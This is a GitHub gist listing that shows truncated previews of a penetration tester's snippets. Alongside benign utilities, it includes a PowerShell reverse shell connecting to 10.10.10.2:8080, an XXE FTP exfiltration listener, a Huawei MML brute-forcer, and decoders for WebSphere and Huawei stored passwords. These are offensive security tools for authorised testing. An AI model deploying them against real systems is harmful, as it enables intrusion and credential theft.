Skip to content

Instantly share code, notes, and snippets.

@staaldraad
staaldraad / MetasploitDockerfile
Last active Nov 2, 2017
Metasploit in a Docker container
View MetasploitDockerfile
FROM ubuntu:14.04
MAINTAINER Etienne Stalmans, etienne@sensepost.com
RUN apt-get update && apt-get install -y \
unzip \
iptables
RUN apt-get install -y \
build-essential \
@staaldraad
staaldraad / decodeWAS.py
Created Dec 1, 2015
Decode websphere passwords
View decodeWAS.py
#!/bin/bash
import sys
import binascii
tmp = binascii.a2b_base64(sys.argv[1])
out = ""
for x in tmp:
out += chr(ord(x)^95) #xor with the underscore char (_)
@staaldraad
staaldraad / signer.sh
Last active Oct 16, 2015
Script to sign PDFs
View signer.sh
#! /bin/bash
# PDF signing in Linux
# Author: etienne@sensepost.com
# Version: 1.0 16 October 2015
# Requirements: xv, imagemagick
# Check if requirements are met:
if ! which convert 2>/dev/null; then
echo "ImageMagick not installed and is required"
exit 1
fi
View awks
Create a sha256 hash (in uppercase) for each line in a file:
awk '{printf "%s - ",$1 }{"echo -n "$1"|sha256sum"|getline d;split(d,a,"-"); print toupper(a[1])}' notes.txt
For each line in the 'reps.txt' - create a random string of correct length and do a replace.
for i in `cat reps.txt`; do [16:28]
x=`cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w ${#i} | head -n 1`; echo $x;
sed -i "s/$i/$x/g" x6 ;
done
@staaldraad
staaldraad / xxeftp.py
Created Jul 2, 2015
Python FTP server for XXE
View xxeftp.py
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
@staaldraad
staaldraad / ipconv.py
Last active Aug 28, 2022
Quick script to generate different formats for a given IP address.
View ipconv.py
#!/usr/bin/env python
import sys
if len(sys.argv) < 2:
print "Enter IP address as first argument: python %s 127.0.0.1"%sys.argv[0]
sys.exit(1)
ip = sys.argv[1]
ips = ip.split('.')
iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips))
@staaldraad
staaldraad / minRev.ps1
Last active Oct 21, 2022
Simple reverse shell in Powershell
View minRev.ps1
$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("> ");
$writer.Flush();
$read = $null;
@staaldraad
staaldraad / veripos_fuzz.py
Last active Jun 30, 2022
Fuzz Verifone PoS terminals through exposed port
View veripos_fuzz.py
#!/usr/env/python
'''
Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol: http://web.archive.org/web/20120603221525/http://www.verifone.com/PDF/guides/tcl_ref.pdf
Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented.
Author: etienne@sensepost.com
Version: 1.0
License: GNU GENERAL PUBLIC LICENSE (GNU) Version 2
'''
@staaldraad
staaldraad / mmlBrute.py
Created Mar 11, 2015
Brute force username/passwords for MML on Huawei devices. Default port 6000
View mmlBrute.py
#!/usr/bin/python
"""
Brute-force tool to find the username/password for MML on a Huawei device.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (14/01/2014)
"""
import sys
import telnetlib
@staaldraad
staaldraad / huaweiDecrypt.py
Created Mar 11, 2015
Decrypt Huawei router/firewall passwords. Huawei stores passwords using DES encryption when the crypted option is enabled.
View huaweiDecrypt.py
#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""
from Crypto.Cipher import DES